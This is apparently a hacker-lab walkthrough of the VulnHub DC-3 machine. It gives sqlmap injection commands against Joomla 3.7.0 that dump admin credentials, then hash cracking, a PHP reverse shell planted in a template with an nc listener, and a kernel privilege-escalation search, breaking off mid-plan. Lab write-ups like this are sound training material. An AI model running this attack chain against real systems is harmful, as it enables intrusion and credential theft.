VulnHub – DC-3 – Dan Rigby PenTesting

A ping sweep using nmap –sn 10.0.2.* reveals the IP address of DC-3 as 10.0.2.27

A port scan using nmap –A 10.0.2.27 shows port 80 is the only open port and it is running a Joomla based page.

Using joomscan –u http://10.0.2.27 reveals that the Joomla version is 3.7.0

searchsploit joomla 3.7.0 reveals that this particular version is vulnerable to SQL injection, there’s even a text file that documents an SQLMap script to run against it.

Running the script Sqlmap –u http://10.0.2.27/index.php?option=com_fields&view=fields&layout=modal&list%5Bfulllordering%5D=updatexml –risk=3 –level=5 –random-agent –dbs -p list[fullordering] reveals 5 databases.

I then modified the script to Sqlmap –u http://10.0.2.27/index.php?option=com_fields&view=fields&layout=modal&list%5Bfulllordering%5D=updatexml –risk=3 –level=5 –random-agent -D joomladb –tables –p list[fullordering]
This check the tables in joomladb. I am particularly interested by #__users

I then modified the script further to find the columns within the table #__users
Sqlmap –u http://10.0.2.27/index.php?option=com_fields&view=fields&layout=modal&list%5Bfulllordering%5D=updatexml –risk=3 –level=5 –random-agent -D joomladb -T ‘#__users’ –columns -p list[fullordering]
This reveals 4 columns but unfortunately no password column.

I modified the script once more to
Sqlmap –u http://10.0.2.27/index.php?option=com_fields&view=fields&layout=modal&list%5Bfulllordering%5D=updatexml –risk=3 –level=5 –random-agent -D joomladb -T ‘#__users’ –C username,password -p list[fullordering] –dump
This will pull the information from the username and hopefully an unlisted password column within the #__users table.

This successfully pulled the username admin and a password hash, I then used John The Ripper to crack the password hash which was revealed to be snoopy

I then opened FireFox and navigated to the typical joomla admin login page – 10.0.2.27/administrator where I would successfully use the username and password combination pulled from the SQL Database.

Navigating to the templates page shows that the protostar template is set as default. At this point the plan is to upload the usual PHP reverse shell.

I tried pasting the code into index.php and previewing the page but this didn’t work. I then created a new page for the shell called shell.php

I copied the PHP script onto this page and set up a listener using nc –lvp 1234

With everything now in place I navigated to the new page I created 10.0.2.27/templates/protostar/shell.php
The page hangs and checking back to my listener confirms I have a shell!

I first of all used python to spawn a bash shell using python –c ‘import pty; pty.spawn(“/bin/bash”)’
I then began enumerating, first of all checking who I was logged in as, followed by the operating system and the kernel it was running on by using the commands:
id
uname –a
cat /etc/*-release

Using searchsploit ubuntu 16.04 reveals quite a few potential vulnerabilities that could lead to privilege escalation.

After unsuccessfully trying a few of these I found some success using the ‘double-fdput()’ vulnerability (39772.txt). This detailed the vulnerability along with a URL to download a script to trigger it – excellent!

The plan now is to download the script onto DC-3, first of all I’ll need a directory that I have permissions to write to, /var/www/html was my first thought as I’m logged in as www-data, this was confirmed by using ls -la